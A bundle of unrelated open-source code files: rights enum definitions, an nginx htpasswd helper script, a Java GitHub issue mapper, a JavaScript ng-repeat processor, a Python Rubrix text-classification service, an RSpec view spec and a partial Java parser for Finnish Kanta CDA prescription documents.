	defineEnum(PayloadFormatter_FORMATTER_JAVASCRIPT, "JavaScript")
	defineEnum(PayloadFormatter_FORMATTER_CAYENNELPP, "Cayenne LPP")
	// User rights.
	defineEnum(Right_RIGHT_USER_INFO, "view user information")
	defineEnum(Right_RIGHT_USER_SETTINGS_BASIC, "edit basic user settings")
	defineEnum(Right_RIGHT_USER_SETTINGS_API_KEYS, "view and edit user API keys")
	defineEnum(Right_RIGHT_USER_DELETE, "delete user account")
	defineEnum(Right_RIGHT_USER_AUTHORIZED_CLIENTS, "view and edit authorized OAuth clients of the user")
	defineEnum(Right_RIGHT_USER_APPLICATIONS_LIST, "list applications the user is a collaborator of")
	defineEnum(Right_RIGHT_USER_APPLICATIONS_CREATE, "create an application under the user account")
	defineEnum(Right_RIGHT_USER_GATEWAYS_LIST, "list gateways the user is a collaborator of")
	defineEnum(Right_RIGHT_USER_GATEWAYS_CREATE, "create a gateway under the user account")
	defineEnum(Right_RIGHT_USER_CLIENTS_LIST, "list OAuth clients the user is a collaborator of")
	defineEnum(Right_RIGHT_USER_CLIENTS_CREATE, "create an OAuth client under the user account")
	defineEnum(Right_RIGHT_USER_ORGANIZATIONS_LIST, "list organizations the user is a member of")
	defineEnum(Right_RIGHT_USER_ORGANIZATIONS_CREATE, "create an organization under the user account")
	defineEnum(Right_RIGHT_USER_ALL, "all user rights")
	// Application rights.
	defineEnum(Right_RIGHT_APPLICATION_INFO, "view application information")
	defineEnum(Right_RIGHT_APPLICATION_SETTINGS_BASIC, "edit basic application settings")
	defineEnum(Right_RIGHT_APPLICATION_SETTINGS_API_KEYS, "view and edit application API keys")
	defineEnum(Right_RIGHT_APPLICATION_SETTINGS_COLLABORATORS, "view and edit application collaborators")
	defineEnum(Right_RIGHT_APPLICATION_SETTINGS_PACKAGES, "view and edit application packages and associations")
	defineEnum(Right_RIGHT_APPLICATION_DELETE, "delete application")
	defineEnum(Right_RIGHT_APPLICATION_DEVICES_READ, "view devices in application")
	defineEnum(Right_RIGHT_APPLICATION_DEVICES_WRITE, "create devices in application")
	defineEnum(Right_RIGHT_APPLICATION_DEVICES_READ_KEYS, "view device keys in application")
	defineEnum(Right_RIGHT_APPLICATION_DEVICES_WRITE_KEYS, "edit device keys in application")
	defineEnum(Right_RIGHT_APPLICATION_TRAFFIC_READ, "read application traffic (uplink and downlink)")
	defineEnum(Right_RIGHT_APPLICATION_TRAFFIC_UP_WRITE, "write uplink application traffic")
	defineEnum(Right_RIGHT_APPLICATION_TRAFFIC_DOWN_WRITE, "write downlink application traffic")
	defineEnum(Right_RIGHT_APPLICATION_LINK, "link as Application to a Network Server for traffic exchange, i.e. read uplink and write downlink")
	defineEnum(Right_RIGHT_APPLICATION_ALL, "all application rights")
	// OAuth client rights.
	defineEnum(Right_RIGHT_CLIENT_ALL, "all OAuth client rights")
	// Gateway rights.
	defineEnum(Right_RIGHT_GATEWAY_INFO, "view gateway information")
	defineEnum(Right_RIGHT_GATEWAY_SETTINGS_BASIC, "edit basic gateway settings")
	defineEnum(Right_RIGHT_GATEWAY_SETTINGS_API_KEYS, "view and edit gateway API keys")
	defineEnum(Right_RIGHT_GATEWAY_SETTINGS_COLLABORATORS, "view and edit gateway collaborators")
	defineEnum(Right_RIGHT_GATEWAY_DELETE, "delete gateway")
	defineEnum(Right_RIGHT_GATEWAY_TRAFFIC_READ, "read gateway traffic")
	defineEnum(Right_RIGHT_GATEWAY_TRAFFIC_DOWN_WRITE, "write downlink gateway traffic")
	defineEnum(Right_RIGHT_GATEWAY_LINK, "link as Gateway to a Gateway Server for traffic exchange, i.e. write uplink and read downlink")
	defineEnum(Right_RIGHT_GATEWAY_STATUS_READ, "view gateway status")
	defineEnum(Right_RIGHT_GATEWAY_LOCATION_READ, "view gateway location")
	defineEnum(Right_RIGHT_GATEWAY_WRITE_SECRETS, "store secrets for a gateway")
	defineEnum(Right_RIGHT_GATEWAY_READ_SECRETS, "retrieve secrets associated with a gateway")
	defineEnum(Right_RIGHT_GATEWAY_ALL, "all gateway rights")
	// Organization rights.
	defineEnum(Right_RIGHT_ORGANIZATION_INFO, "view organization information")
	defineEnum(Right_RIGHT_ORGANIZATION_SETTINGS_BASIC, "edit basic organization settings")
	defineEnum(Right_RIGHT_ORGANIZATION_SETTINGS_API_KEYS, "view and edit organization API keys")
	defineEnum(Right_RIGHT_ORGANIZATION_SETTINGS_MEMBERS, "view and edit organization members")
	defineEnum(Right_RIGHT_ORGANIZATION_DELETE, "delete organization")
	defineEnum(Right_RIGHT_ORGANIZATION_APPLICATIONS_LIST, "list the applications the organization is a collaborator of")
	defineEnum(Right_RIGHT_ORGANIZATION_APPLICATIONS_CREATE, "create an application under the organization")
	defineEnum(Right_RIGHT_ORGANIZATION_GATEWAYS_LIST, "list the gateways the organization is a collaborator of")
	defineEnum(Right_RIGHT_ORGANIZATION_GATEWAYS_CREATE, "create a gateway under the organization")
	defineEnum(Right_RIGHT_ORGANIZATION_CLIENTS_LIST, "list the OAuth clients the organization is a collaborator of")
	defineEnum(Right_RIGHT_ORGANIZATION_CLIENTS_CREATE, "create an OAuth client under the organization")
	defineEnum(Right_RIGHT_ORGANIZATION_ADD_AS_COLLABORATOR, "add the organization as a collaborator on an existing entity")
	defineEnum(Right_RIGHT_ORGANIZATION_ALL, "all organization rights")
	// Miscellaneous rights.
	defineEnum(Right_RIGHT_SEND_INVITES, "send user invites")
	defineEnum(Right_RIGHT_ALL, "all possible rights")
}
|
#!/bin/bash
# Creates (overwriting) an nginx basic-auth password file with a single user.
# Usage: ./script <username> <password>

USERNAME="$1"
PASSWORD="$2"

# Fail fast with a usage message instead of writing an empty credential.
if [[ -z "$USERNAME" || -z "$PASSWORD" ]]; then
    echo "Usage: $0 <username> <password>" >&2
    exit 1
fi

# -b: password taken from the command line; -c: (re)create the file.
# Fix: quote the variables — unquoted expansions word-split passwords that
# contain spaces or glob characters.
htpasswd -b -c /etc/nginx/conf.d/password.htpasswd "$USERNAME" "$PASSWORD"
<reponame>youaxa/ara-poc-open
package com.decathlon.ara.defect.github;
import com.fasterxml.jackson.core.type.TypeReference;
import com.fasterxml.jackson.databind.ObjectMapper;
import lombok.RequiredArgsConstructor;
import lombok.extern.slf4j.Slf4j;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;
/**
 * Maps Github API JSON responses onto the Java POJOs of this project.
 *
 * @author <NAME>
 * @since 3.1.0
 */
@Service
@Slf4j
@RequiredArgsConstructor(onConstructor = @__(@Autowired))
class GithubMapper {

    /** Jackson type token for a single issue payload. */
    static final TypeReference<GithubIssue> TYPE_REFERENCE_TO_GITHUB_ISSUE =
            new TypeReference<GithubIssue>() {
            };

    /** Jackson type token for an array-of-issues payload. */
    static final TypeReference<List<GithubIssue>> TYPE_REFERENCE_TO_LIST_GITHUB_ISSUE =
            new TypeReference<List<GithubIssue>>() {
            };

    @Autowired
    private final ObjectMapper objectMapper;

    /**
     * Deserializes the given json String into a GithubIssue.
     *
     * @param json the GitHub REST API response json
     * @return an Optional holding the GithubIssue, or empty if the json is malformed / doesn't match.
     */
    Optional<GithubIssue> jsonToIssue(String json) {
        try {
            GithubIssue issue = this.objectMapper.readValue(json, TYPE_REFERENCE_TO_GITHUB_ISSUE);
            return Optional.of(issue);
        } catch (IOException ex) {
            log.warn("Unable to cast this json to a github issue : " + json, ex);
            return Optional.empty();
        }
    }

    /**
     * Deserializes the given json array String into a list of GithubIssue.
     *
     * @param json the GitHub REST API response json
     * @return the list of GithubIssue, or an empty list if the json is malformed / doesn't match.
     */
    List<GithubIssue> jsonToIssueList(String json) {
        try {
            List<GithubIssue> issues = this.objectMapper.readValue(json, TYPE_REFERENCE_TO_LIST_GITHUB_ISSUE);
            return issues;
        } catch (IOException ex) {
            log.warn("Unable to cast this json to a list of github issues : " + json, ex);
            return new ArrayList<>();
        }
    }
}
|
"use strict";
const _ = require('lodash');
const getNormalizedAttributeValue = require('../../../dom/attributes').getNormalizedAttributeValue;
const Assertions = require('../../../assertions');
const Types = require('../../../types');
// Processor for DOM elements that carry a non-empty `ng-repeat` attribute.
class NgRepeatProcessor {
    // True when the element has a non-empty (normalized) ng-repeat attribute.
    matches(domElement) {
        const repeatExpression = getNormalizedAttributeValue(domElement, 'ng-repeat');
        return !_.isEmpty(repeatExpression);
    }

    // Registers a page section typed as NG_REPEAT with a COUNT assertion, and
    // requests page-tree traversal before and after the element's children.
    process(context) {
        const section = context.addPageSection();
        section.addTypes(Types.NG_REPEAT);
        section.addAssertions(Assertions.COUNT);
        context.setTraversePageTreeDownBeforeChildren();
        context.setTraversePageTreeUpAfterChildren();
    }
}

module.exports = NgRepeatProcessor;
<gh_stars>1-10
# coding=utf-8
# Copyright 2021-present, the Recognai S.L. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Iterable, List, Optional
from fastapi import Depends
from rubrix.server.commons.es_helpers import sort_by2elasticsearch
from rubrix.server.datasets.model import Dataset
from rubrix.server.tasks.commons import (
BulkResponse,
EsRecordDataFieldNames,
SortableField,
)
from rubrix.server.tasks.commons.dao import extends_index_dynamic_templates
from rubrix.server.tasks.commons.dao.dao import DatasetRecordsDAO, dataset_records_dao
from rubrix.server.tasks.commons.dao.model import RecordSearch
from rubrix.server.tasks.commons.metrics.service import MetricsService
from rubrix.server.tasks.text_classification.api.model import (
CreationTextClassificationRecord,
TextClassificationQuery,
TextClassificationRecord,
TextClassificationSearchAggregations,
TextClassificationSearchResults,
)
# Register a dynamic index template so every sub-field under ``inputs`` is
# mapped as free text in Elasticsearch.
extends_index_dynamic_templates(
    {"inputs": {"path_match": "inputs.*", "mapping": {"type": "text"}}}
)
class TextClassificationService:
    """
    Text classification service

    Coordinates the records DAO (persistence/search) and the metrics service
    for text classification datasets.
    """

    def __init__(
        self,
        dao: DatasetRecordsDAO,
        metrics: MetricsService,
    ):
        self.__dao__ = dao
        self.__metrics__ = metrics

    def add_records(
        self,
        dataset: Dataset,
        records: List[CreationTextClassificationRecord],
    ):
        """
        Add a batch of records to a dataset, after validating that their
        multi-label flag matches the records already stored.

        Returns a ``BulkResponse`` with the number of processed/failed records.
        """
        self._check_multi_label_integrity(dataset, records)
        self.__metrics__.build_records_metrics(dataset, records)
        failed = self.__dao__.add_records(
            dataset=dataset, records=records, record_class=TextClassificationRecord
        )
        return BulkResponse(dataset=dataset.name, processed=len(records), failed=failed)

    def search(
        self,
        dataset: Dataset,
        query: TextClassificationQuery,
        sort_by: List[SortableField],
        record_from: int = 0,
        size: int = 100,
    ) -> TextClassificationSearchResults:
        """
        Run a search in a dataset

        Parameters
        ----------
        dataset:
            The records dataset
        query:
            The search parameters
        sort_by:
            The sort by list
        record_from:
            The record from return results
        size:
            The max number of records to return

        Returns
        -------
        The matched records with aggregation info for specified task_meta.py
        """
        results = self.__dao__.search_records(
            dataset,
            search=RecordSearch(
                query=query.as_elasticsearch(),
                sort=sort_by2elasticsearch(
                    sort_by,
                    valid_fields=[
                        "metadata",
                        EsRecordDataFieldNames.score,
                        EsRecordDataFieldNames.predicted,
                        EsRecordDataFieldNames.predicted_as,
                        EsRecordDataFieldNames.predicted_by,
                        EsRecordDataFieldNames.annotated_as,
                        EsRecordDataFieldNames.annotated_by,
                        EsRecordDataFieldNames.status,
                        EsRecordDataFieldNames.event_timestamp,
                    ],
                ),
            ),
            size=size,
            record_from=record_from,
        )
        return TextClassificationSearchResults(
            total=results.total,
            records=[TextClassificationRecord.parse_obj(r) for r in results.records],
            aggregations=TextClassificationSearchAggregations(
                **results.aggregations,
                words=results.words,
                metadata=results.metadata or {},
            )
            if results.aggregations
            else None,
        )

    def read_dataset(
        self,
        dataset: Dataset,
        query: Optional[TextClassificationQuery] = None,
    ) -> Iterable[TextClassificationRecord]:
        """
        Scan a dataset records

        Parameters
        ----------
        dataset:
            The dataset name
        query:
            If provided, scan will retrieve only records matching
            the provided query filters. Optional
        """
        # Fix: ``query`` is optional, but the previous code always called
        # ``query.as_elasticsearch()`` and raised AttributeError for ``None``.
        # NOTE(review): assumes RecordSearch treats a missing query as
        # match-all — confirm against RecordSearch's model definition.
        es_query = query.as_elasticsearch() if query is not None else None
        for db_record in self.__dao__.scan_dataset(
            dataset, search=RecordSearch(query=es_query)
        ):
            yield TextClassificationRecord.parse_obj(db_record)

    def _check_multi_label_integrity(
        self, dataset: Dataset, records: List[CreationTextClassificationRecord]
    ):
        # Validate that the incoming batch's multi-label flag matches the
        # records already stored in the dataset.
        # Fix: an empty batch previously raised IndexError on records[0]; the
        # annotation also now matches what add_records actually passes
        # (creation records).
        if not records:
            return
        # Fetch a single stored record to compare against
        results = self.search(
            dataset, query=TextClassificationQuery(), size=1, sort_by=[]
        )
        if results.records:
            is_multi_label = records[0].multi_label
            assert is_multi_label == results.records[0].multi_label, (
                "You cannot pass {labels_type} records for this dataset. "
                "Stored records are {labels_type}".format(
                    labels_type="multi-label" if is_multi_label else "single-label"
                )
            )
# Module-level singleton holding the lazily-created service instance.
_instance = None


def text_classification_service(
    dao: DatasetRecordsDAO = Depends(dataset_records_dao),
    metrics: MetricsService = Depends(MetricsService.get_instance),
) -> TextClassificationService:
    """
    Creates a dataset record service instance

    Parameters
    ----------
    dao:
        The dataset records dao dependency
    metrics:
        The metrics service

    Returns
    -------
    A dataset records service instance
    """
    # NOTE(review): first call wins — subsequent calls ignore their ``dao``
    # and ``metrics`` arguments because the cached instance is reused.
    global _instance
    if not _instance:
        _instance = TextClassificationService(dao=dao, metrics=metrics)
    return _instance
|
<filename>spec/views/purchases/new.html.erb_spec.rb
require 'rails_helper'
# View spec for the "new purchase" template: renders the form and checks that
# every expected input/select is present and that it POSTs to the purchases path.
RSpec.describe "purchases/new", type: :view do
  before(:each) do
    # Supply a fresh, unsaved Purchase for the form builder to bind to
    assign(:purchase, Purchase.new)
  end
  it "renders new purchase form" do
    render
    # The form must submit via POST to the purchases collection path
    assert_select "form[action=?][method=?]", purchases_path, "post" do
      # Association dropdowns
      assert_select "select[name=?]", "purchase[location_id]"
      assert_select "input[name=?]", "purchase[total_price]"
      assert_select "select[name=?]", "purchase[purchased_by_id]"
      assert_select "select[name=?]", "purchase[reimbursed_by_id]"
      # Reimbursement bookkeeping fields
      assert_select "input[name=?]", "purchase[reimbursement_check_number]"
      assert_select "input[name=?]", "purchase[reimbursement_status]"
    end
  end
end
|
# Take the first element of the list, falling back to None when it is empty.
my_list = [1, 2, 3, 4, 5]
# Idiomatic conditional expression replaces the four-line if/else block.
element = my_list[0] if my_list else None
<reponame>villelaitila/KantaCDA-API
<!--
Copyright 2020 Kansaneläkelaitos
Licensed under the Apache License, Version 2.0 (the "License"); you may not
use this file except in compliance with the License. You may obtain a copy
of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations under
the License.
-->
package fi.kela.kanta.cda;
import java.io.IOException;
import java.io.Serializable;
import java.text.ParseException;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
import java.util.Properties;
import javax.xml.bind.JAXBElement;
import org.apache.commons.configuration.ConfigurationException;
import org.hl7.v3.AD;
import org.hl7.v3.ANY;
import org.hl7.v3.AdxpCity;
import org.hl7.v3.AdxpCountry;
import org.hl7.v3.AdxpPostalCode;
import org.hl7.v3.AdxpStreetAddressLine;
import org.hl7.v3.BIN;
import org.hl7.v3.EN;
import org.hl7.v3.ENXP;
import org.hl7.v3.EnDelimiter;
import org.hl7.v3.EnFamily;
import org.hl7.v3.EnGiven;
import org.hl7.v3.EnPrefix;
import org.hl7.v3.EnSuffix;
import org.hl7.v3.PN;
import org.hl7.v3.POCDMT000040ClinicalDocument;
import org.hl7.v3.POCDMT000040InfrastructureRootTemplateId;
import org.hl7.v3.POCDMT000040Organization;
import org.hl7.v3.POCDMT000040Section;
import org.hl7.v3.StrucDocContent;
import org.hl7.v3.StrucDocParagraph;
import org.hl7.v3.StrucDocText;
import org.hl7.v3.TEL;
import fi.kela.kanta.exceptions.PurkuException;
import fi.kela.kanta.to.KokoNimiTO;
import fi.kela.kanta.to.LaakemaarayksenKorjausTO;
import fi.kela.kanta.to.LaakemaarayksenMitatointiTO;
import fi.kela.kanta.to.LaakemaaraysTO;
import fi.kela.kanta.to.LeimakentatTO;
import fi.kela.kanta.to.OrganisaatioTO;
import fi.kela.kanta.to.OsoiteTO;
import fi.kela.kanta.util.AsiakirjaVersioUtil;
import fi.kela.kanta.util.KantaCDAUtil;
/**
 * Abstract base class for parsers ("purkaja") that extract data from HL7 v3
 * CDA R2 clinical documents of the Finnish Kanta services (e.g. electronic
 * prescriptions) into transfer objects (TOs). Provides shared helpers for
 * stamp fields, person names, organizations, addresses, timestamps and
 * narrative text sections. Concrete subclasses declare the code system they
 * operate on via {@link #getCodeSystem()}.
 */
public abstract class Purkaja {

    // Timestamp pattern used by CDA effectiveTime values.
    final private static String sdfKuvio = "yyyyMMddHHmmss";
    // TEL value prefixes used to tell phone numbers and e-mail addresses apart.
    private static final String TelPrefix = "tel:";
    private static final String EmailPrefix = "mailto:";
    // Name of the properties file with prescription (resepti) configuration.
    private static final String resepti_properties = "resepti.properties";

    /** @return the code system identifier the concrete parser operates on */
    protected abstract String getCodeSystem();

    // Lazily-created utility for resolving document version compatibility.
    private AsiakirjaVersioUtil versioUtil;
    // Loaded CDA specification configuration (shared by the helpers below).
    private MaarittelyKonfiguraatio maarittelyKonfiguraatio;

    protected Purkaja() throws ConfigurationException {
        // Load the specification configuration on first construction only.
        if ( maarittelyKonfiguraatio == null ) {
            maarittelyKonfiguraatio = MaarittelyKonfiguraatio.lueKonfiguraatio();
        }
    }

    /**
     * Extracts the stamp fields from the given clinical document, treating it
     * as a non-composition document (isKooste = false).
     *
     * @param clinicalDocument
     *            POCDMT000040ClinicalDocument CDA document to extract from
     * @param kentat
     *            TO derived from LeimakentatTO that receives the values
     * @throws PurkuException
     */
    protected void puraLeimakentat(POCDMT000040ClinicalDocument clinicalDocument, LeimakentatTO<?> kentat)
            throws PurkuException {
        puraLeimakentat(clinicalDocument, kentat, false);
    }

    /**
     * Extracts the stamp fields from the given clinicalDocument. Sets the OID,
     * setId, CDA type, version number and timestamp on the given TO (derived
     * from LeimakentatTO) based on the clinical document. If isKooste is true,
     * the CDA type is set to -1 when the document has no type code.
     *
     * @param clinicalDocument
     *            POCDMT000040ClinicalDocument CDA document to extract from
     * @param kentat
     *            TO class derived from LeimakentatTO that receives the values
     * @param isKooste
     *            boolean whether the document is a composition (kooste)
     * @throws PurkuException
     */
    protected void puraLeimakentat(POCDMT000040ClinicalDocument clinicalDocument, LeimakentatTO<?> kentat,
            boolean isKooste) throws PurkuException {
        kentat.setOid(clinicalDocument.getId().getRoot());
        kentat.setSetId(clinicalDocument.getSetId().getRoot());
        final String tyyppiKoodi = clinicalDocument.getCode().getCode();
        if ( null != tyyppiKoodi && tyyppiKoodi.length() > 0 ) {
            kentat.setCdaTyyppi(Integer.parseInt(tyyppiKoodi));
        }
        else {
            // A missing type code is fatal except for composition documents.
            if ( !isKooste ) {
                throw new PurkuException("clinicalDocument/code/@code");
            }
            else {
                kentat.setCdaTyyppi(-1);
            }
        }
        final String versionumero = String.valueOf(clinicalDocument.getVersionNumber().getValue());
        if ( versionumero.length() > 0 && !"null".equals(versionumero) ) {
            kentat.setVersio(Integer.parseInt(versionumero));
        }
        else {
            kentat.setVersio(0);
        }
        final String aikaleima = clinicalDocument.getEffectiveTime().getValue();
        // Only the first 12 digits (yyyyMMddHHmm) of the timestamp are used here.
        if ( null != aikaleima && aikaleima.length() > 12 && !"nulldate".equals(aikaleima) ) {
            kentat.setAikaleima(puraAika(aikaleima.substring(0, 12)));
        }
        /*
         * Read the producing software product name and version.
         */
        if ( null != clinicalDocument.getLocalHeader()
                && null != clinicalDocument.getLocalHeader().getSoftwareSupport() ) {
            String product = clinicalDocument.getLocalHeader().getSoftwareSupport().getProduct();
            if ( null != product && product.length() > 0 ) {
                kentat.setProduct(product);
            }
            String version = clinicalDocument.getLocalHeader().getSoftwareSupport().getVersion();
            if ( null != version && version.length() > 0 ) {
                kentat.setProductVersion(version);
            }
        }
        /*
         * Collect the CDA specification version template ids from the header.
         */
        for (POCDMT000040InfrastructureRootTemplateId templateId : clinicalDocument.getTemplateIds()) {
            if ( templateId.getRoot() != null && !templateId.getRoot().isEmpty() ) {
                if ( templateId.getExtension() != null && !templateId.getExtension().isEmpty() ) {
                    kentat.getTemplateIds().add(templateId.getRoot() + "." + templateId.getExtension());
                }
                else {
                    kentat.getTemplateIds().add(templateId.getRoot());
                }
            }
        }
        /*
         * Collect the CDA specification version template ids from structuredBody.
         */
        for (POCDMT000040InfrastructureRootTemplateId templateId : haeStructuredBodyTemplateIs(clinicalDocument)) {
            if ( templateId.getRoot() != null && !templateId.getRoot().isEmpty() ) {
                if ( templateId.getExtension() != null && !templateId.getExtension().isEmpty() ) {
                    kentat.getBodyTemplateIds().add(templateId.getRoot() + "." + templateId.getExtension());
                }
                else {
                    kentat.getBodyTemplateIds().add(templateId.getRoot());
                }
            }
        }
        // Resolve the specification class from the collected template ids.
        kentat.setMaarittelyLuokka(maarittelyKonfiguraatio.haeMaarittelyLuokka(kentat.getTemplateIds(),
                clinicalDocument.getCode().getCode()));
    }

    /**
     * Helper for extracting a person's name. Builds a KokoNimiTO (full name TO)
     * from the given list of PN elements.
     *
     * @param names
     *            List<PN> name elements
     * @return KokoNimiTO built from the names
     */
    protected KokoNimiTO puraKokoNimi(List<PN> names) {
        KokoNimiTO kokoNimi = new KokoNimiTO();
        for (PN name : names) {
            for (Serializable element : name.getContent()) {
                if ( element instanceof JAXBElement<?> ) {
                    JAXBElement<?> el = (JAXBElement<?>) element;
                    if ( el.getValue() instanceof ENXP ) {
                        puraNimitieto((ENXP) el.getValue(), kokoNimi);
                    }
                }
            }
        }
        return kokoNimi;
    }

    /**
     * Helper for extracting organization information (id, name, telecoms,
     * address and, recursively, the containing organization).
     *
     * @param organization
     *            POCDMT000040Organization from which the values are read
     * @return OrganisaatioTO holding the extracted values
     */
    protected OrganisaatioTO puraOrganisaatio(POCDMT000040Organization organization) {
        OrganisaatioTO organisaatioTO = new OrganisaatioTO();
        organisaatioTO.setYksilointitunnus(organization.getIds().get(0).getRoot());
        if ( !organization.getNames().isEmpty() ) {
            organisaatioTO.setNimi((String) organization.getNames().get(0).getContent().get(0));
        }
        // TEL values are distinguished by their URI scheme prefix.
        for (TEL tel : organization.getTelecoms()) {
            if ( tel.getValue().startsWith(Purkaja.TelPrefix) ) {
                organisaatioTO.setPuhelinnumero(tel.getValue());
                if ( !tel.getUses().isEmpty() ) {
                    organisaatioTO.setPuhelinumeroKayttotarkoitus(tel.getUses().get(0));
                }
            }
            else if ( tel.getValue().startsWith(Purkaja.EmailPrefix) ) {
                organisaatioTO.setSahkoposti(tel.getValue());
            }
        }
        if ( !organization.getAddrs().isEmpty() ) {
            organisaatioTO.setOsoite(puraOsoite(organization.getAddrs().get(0)));
        }
        // Recurse into the containing organization (care-giving unit), if any.
        if ( organization.getAsOrganizationPartOf() != null
                && organization.getAsOrganizationPartOf().getWholeOrganization() != null ) {
            organisaatioTO.setToimintaYksikko(
                    puraOrganisaatio(organization.getAsOrganizationPartOf().getWholeOrganization()));
        }
        return organisaatioTO;
    }

    /**
     * Helper for extracting address information.
     *
     * @param addr
     *            AD element from which address parts are read
     * @return OsoiteTO holding the address parts that were found
     */
    protected OsoiteTO puraOsoite(AD addr) {
        // TODO: better way to identify the elements?
        OsoiteTO osoite = new OsoiteTO();
        for (Serializable serializable : addr.getContent()) {
            if ( !(serializable instanceof JAXBElement<?>) ) {
                continue;
            }
            JAXBElement<?> element = (JAXBElement<?>) serializable;
            if ( element.getValue() instanceof AdxpStreetAddressLine ) {
                AdxpStreetAddressLine value = (AdxpStreetAddressLine) element.getValue();
                if ( value.getContent() != null && !value.getContent().isEmpty() ) {
                    osoite.setKatuosoite((String) value.getContent().get(0));
                }
            }
            else if ( element.getValue() instanceof AdxpPostalCode ) {
                AdxpPostalCode value = (AdxpPostalCode) element.getValue();
                if ( value.getContent() != null && !value.getContent().isEmpty() ) {
                    osoite.setPostinumero((String) value.getContent().get(0));
                }
            }
            else if ( element.getValue() instanceof AdxpCity ) {
                AdxpCity value = (AdxpCity) element.getValue();
                if ( value.getContent() != null && !value.getContent().isEmpty() ) {
                    osoite.setPostitoimipaikka((String) value.getContent().get(0));
                }
            }
            else if ( element.getValue() instanceof AdxpCountry ) {
                AdxpCountry value = (AdxpCountry) element.getValue();
                if ( value.getContent() != null && !value.getContent().isEmpty() ) {
                    osoite.setMaa((String) value.getContent().get(0));
                }
            }
        }
        return osoite;
    }

    /**
     * Helper for parsing a timestamp. Parses the given time if it is non-null
     * and contains only digits, assuming the yyyyMMddHHmmss format. If the
     * given time is longer than 14 characters the excess is truncated; if the
     * format pattern is longer than the given time, the pattern is truncated
     * to the time's length instead.
     *
     * @param aika
     *            String time value to parse
     * @return Date, or null when the input is null, too short, or not numeric
     * @throws PurkuException
     */
    protected Date puraAika(String aika) throws PurkuException {
        if ( aika != null ) {
            String lyhytAika;
            if ( aika.length() > Purkaja.sdfKuvio.length() ) {
                lyhytAika = aika.substring(0, Purkaja.sdfKuvio.length());
            }
            else {
                lyhytAika = aika;
            }
            // 0000-99999999999999
            if ( lyhytAika.matches("[0-9]{4,14}") ) {
                SimpleDateFormat sdf = new SimpleDateFormat(Purkaja.sdfKuvio.substring(0, lyhytAika.length()));
                //sdf.setTimeZone(TimeZone.getTimeZone(ReseptiKasaaja.TIME_ZONE));
                try {
                    return sdf.parse(lyhytAika);
                }
                catch (ParseException e) {
                    throw new PurkuException(aika);
                }
            }
        }
        return null;
    }

    /**
     * Helper that checks whether a string is null or empty.
     *
     * @param merkkijono
     *            String to check
     * @return boolean true when the string is null or empty, false otherwise
     */
    protected boolean onkoNullTaiTyhja(String merkkijono) {
        return null == merkkijono || merkkijono.isEmpty();
    }

    /**
     * Helper for fetching an element's content. Returns the first item of the
     * element's content list when the list is non-empty.
     *
     * @param element
     *            ANY whose content is fetched
     * @return String first item of the content list, or null when the list is
     *         empty or the element has no content list.
     */
    protected String puraContent(ANY element) {
        if ( element instanceof BIN && !((BIN) element).getContent().isEmpty() ) {
            return (String) ((BIN) element).getContent().get(0);
        }
        else if ( element instanceof EN && !((EN) element).getContent().isEmpty() ) {
            return (String) ((EN) element).getContent().get(0);
        }
        else if ( element instanceof AD && !((AD) element).getContent().isEmpty() ) {
            return (String) ((AD) element).getContent().get(0);
        }
        return null;
    }

    /**
     * Helper for extracting name parts. Reads the ENXP element's content and
     * its qualifier (if present) and adds the found name part to the given
     * full-name TO when the part's type can be identified.
     *
     * @param value
     *            ENXP element the name part is read from.
     * @param kokoNimi
     *            KokoNimiTO the name part is added to.
     */
    private void puraNimitieto(ENXP value, KokoNimiTO kokoNimi) {
        if ( null == value || value.getContent().isEmpty() ) {
            return;
        }
        String nimi = (String) value.getContent().get(0);
        String maare = null;
        if ( !value.getQualifiers().isEmpty() ) {
            maare = value.getQualifiers().get(0);
        }
        // Map the concrete ENXP subtype to its name-part type keyword.
        String tyyppi = null;
        if ( value instanceof EnGiven ) {
            tyyppi = "given";
        }
        else if ( value instanceof EnFamily ) {
            tyyppi = "family";
        }
        else if ( value instanceof EnPrefix ) {
            tyyppi = "prefix";
        }
        else if ( value instanceof EnSuffix ) {
            tyyppi = "suffix";
        }
        else if ( value instanceof EnDelimiter ) {
            tyyppi = "delimiter";
        }
        if ( null != nimi && null != tyyppi ) {
            kokoNimi.lisaa(tyyppi, maare, nimi);
        }
    }

    /**
     * Creates the prescription TO matching the document's type code: a
     * correction TO, an invalidation TO, or a plain prescription TO.
     *
     * @param clinicalDocument
     *            document whose type code selects the TO subclass
     * @return a new LaakemaaraysTO (or subclass) instance
     */
    protected LaakemaaraysTO luoLaakemaaraysTO(POCDMT000040ClinicalDocument clinicalDocument) {
        int tyyppiKoodi = Integer.parseInt(clinicalDocument.getCode().getCode());
        if ( KantaCDAConstants.ReseptisanomanTyyppi.LAAKEMAARAYKSEN_KORJAUS.getTyyppi() == tyyppiKoodi ) {
            return new LaakemaarayksenKorjausTO();
        }
        if ( KantaCDAConstants.ReseptisanomanTyyppi.LAAKEMAARAYKSEN_MITATOINTI.getTyyppi() == tyyppiKoodi ) {
            return new LaakemaarayksenMitatointiTO();
        }
        return new LaakemaaraysTO();
    }

    /**
     * Loads the prescription properties file, wrapping any IO failure in a
     * RuntimeException (the original error message is preserved verbatim).
     */
    protected Properties loadProperties() {
        Properties props = null;
        try {
            props = KantaCDAUtil.loadProperties(resepti_properties);
        }
        catch (IOException e) {
            throw new RuntimeException("KantaCDA-API / Purkaja: properties tiedoston luku epäonnistui", e);
        }
        return props;
    }

    /**
     * Determines and records the document's specification version and its
     * compatibility status on the given prescription TO. Defaults to
     * EI_TUETTU (unsupported) when no template id is present.
     */
    protected void tarkistaAsiakirjaVersio(POCDMT000040ClinicalDocument clinicalDocument, LaakemaaraysTO laakemaarays) {
        laakemaarays.setAsiakirjaYhteensopivuus(KantaCDAConstants.AsiakirjaVersioYhteensopivuus.EI_TUETTU);
